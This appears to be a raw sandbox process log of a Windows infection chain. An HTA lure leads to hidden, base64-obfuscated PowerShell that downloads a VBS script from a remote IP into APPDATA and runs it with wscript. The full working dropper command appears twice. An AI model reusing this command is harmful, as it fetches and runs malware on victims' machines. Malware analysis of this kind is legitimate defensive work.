iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\bestkissingdayswithgreatnicebeautygirlsareound.hta.html
2604cmd.exe "C:\Windows\system32\cmd.exe" "/C POWersHelL.EXE -ex BYPASs -nop -W 1 -c DevicecrEDENTIALdepLOyMENt.exE ; IEx($(IEX('[sYSTem.Text.eNcODINg]'+[char]58+[ChAr]58+'UTf8.GEtSTring([SYSTem.COnvERt]'+[CHaR]58+[cHAr]0x3A+'FrOMBAse64STRing('+[cHAR]34+'JFFsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUkRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1teGtCSlpqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFQWxsTk9wTXVGVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZnBEUVV4UWpIUSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVXS3pBb0xFLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHb2hQZkV0KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJDV0MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGV6dWxuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFFsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjE2LjE0MS92dnZ2dnZvbnN0cmFpbnRzLnZicyIsIiRlTlY6QVBQREFUQVx2dnZ2dnZvbnN0cmFpbnRzLnZicyIsMCwwKTtzVGFyVC1zTEVFUCgzKTtpblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHZ2dnZ2dm9uc3RyYWludHMudmJzIg=='+[chaR]34+'))')))"
2916powershell.exe POWersHelL.EXE -ex BYPASs -nop -W 1 -c DevicecrEDENTIALdepLOyMENt.exE ; IEx($(IEX('[sYSTem.Text.eNcODINg]'+[char]58+[ChAr]58+'UTf8.GEtSTring([SYSTem.COnvERt]'+[CHaR]58+[cHAr]0x3A+'FrOMBAse64STRing('+[cHAR]34+'JFFsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lTUJFUkRlZklOaXRJT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybE1Pbi5EbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE1teGtCSlpqLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBFQWxsTk9wTXVGVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgZnBEUVV4UWpIUSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEVXS3pBb0xFLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHb2hQZkV0KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJDV0MiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQW1lU3BhY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaGV6dWxuICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFFsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjE2LjE0MS92dnZ2dnZvbnN0cmFpbnRzLnZicyIsIiRlTlY6QVBQREFUQVx2dnZ2dnZvbnN0cmFpbnRzLnZicyIsMCwwKTtzVGFyVC1zTEVFUCgzKTtpblZvS2UtSVRlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXHZ2dnZ2dm9uc3RyYWludHMudmJzIg=='+[chaR]34+'))')))"
2976csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\gqqctndm.cmdline"
2344cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESB1D7.tmp" "c:\Users\test22\AppData\Local\Temp\CSCB159.tmp"
2352wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\test22\AppData\Roaming\vvvvvvonstraints.vbs"
2936